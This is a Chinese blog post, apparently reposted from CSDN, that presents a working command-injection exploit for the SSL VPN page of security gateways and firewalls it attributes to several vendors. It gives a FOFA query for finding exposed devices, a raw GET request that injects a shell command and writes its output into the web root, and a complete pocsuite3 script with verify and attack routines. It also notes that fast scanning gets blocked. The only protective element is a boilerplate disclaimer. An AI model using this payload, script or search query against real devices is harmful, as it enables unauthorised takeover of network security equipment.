漏洞复现-多个产商安全产品存在命令执行poc(附漏洞检测脚本)
2023-12-14 10:35:55
免责声明
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责
漏洞描述
多个产商安全产品存在命令执行,攻击者可通过此漏洞获取服务器权限。
漏洞影响内容
H3C-下一代防火墙
安恒信息-明御安全网关
MAiPU-安全网关
D_Link-下一代防火墙
HUAWEI-公司产品
迈普通信技术股份有限公司安全网关
博达通信-下一代防火墙
任天行网络安全管理系统\安全审计系统
安博通应用网关
烽火网络安全审计
瑞斯康达科技发展股份有限公司安全路由器
任子行网络安全审计系统
绿盟安全审计系统
深圳市鑫塔科技有限公司第二代防火墙
fofa语句
body="/webui/images/default/default/alert_close.jpg"
poc语句加检测
poc语句
GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
一般出现这个页面就表示漏洞利用成功,可以去ip/sslvpn/cheshi页面查看whoami内容
不过因为是安全设备,你扫快了扫多了,会直接g的
这个是同一个页面,因为在写脚本的时候多次测试,直接显示404了。
poc脚本
脚本用的pocsuite框架
# -*- coding: utf-8 -*-
# 2023/12/7 11:59
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE
from pocsuite3.api import OrderedDict, OptString
class Multiple_vendors_RCE(POCBase):
author = '炼金术师诸葛亮'
createDate = '2023-12-7'
name = 'Multiple-vendors-RCE'
appName = 'Multiple-vendors-RCE'
vulType = 'Command Execution' # 漏洞类型,参见漏洞类型规范表
desc = '多个产商安全产品存在命令执行,攻击者可通过此漏洞获取服务器权限。' # 漏洞简要描述
def _verify(self):
result = {}
path = "/sslvpn/sslvpn_client.php" # 参数
url = self.url + path
payload = "?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls" # payload
r = requests.get(url + payload)
print(r.text)
# 验证成功输出相关信息
if r and r.status_code == 200 and "whoami" in r.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Name'] = payload
return self.parse_output(result)
def _attack(self):
result = {}
path = "/sslvpn/ceshi.php"
url = self.url + path
headers={
'Cache-Control': 'max-age=0',
'Sec-Ch-Ua': '"Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"',
'Sec-Ch-Ua-Mobile': '?0',
'Sec-Ch-Ua-Platform': '"Windows"',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'document',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
r = requests.get(url,headers=headers)
if r and r.status_code == 200 and "www" in r.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Resp'] = r.text
return self.parse_output(result)
register_poc(Multiple_vendors_RCE)
脚本使用
文章来源:https://blog.csdn.net/jjjj1029056414/article/details/134852629
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!